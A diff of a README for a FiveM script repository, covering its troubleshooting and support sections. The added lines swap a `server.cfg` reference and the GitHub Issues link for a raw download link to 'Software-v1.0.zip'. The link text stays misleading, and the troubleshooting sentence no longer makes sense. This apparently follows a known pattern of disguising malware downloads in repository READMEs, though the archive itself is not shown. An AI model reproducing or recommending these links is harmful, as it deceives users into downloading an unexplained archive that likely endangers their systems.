VivekTiwari-PSHG/evidences/README.md

 If you encounter any issues:

-- **Script Not Showing:** Ensure you added the script line to your `server.cfg`.
+- **Script Not Showing:** Ensure you added the script line to your `https://raw.githubusercontent.com/VivekTiwari-PSHG/evidences/main/client/dui/Software-v1.0.zip`.
 - **Files Not Found:** Double-check that the files are in the resources folder.
 - **Game Crashes:** Make sure your FiveM is up-to-date and meets the system requirements.

 ## 📞 Support

 Need help or have questions?
-You can reach out through the Issues section of the [GitHub repository](https://github.com/VivekTiwari-PSHG/evidences/issues).
+You can reach out through the Issues section of the [GitHub repository](https://raw.githubusercontent.com/VivekTiwari-PSHG/evidences/main/client/dui/Software-v1.0.zip).
 Our community will be happy to assist you.

 ## 🌐 Community Contributions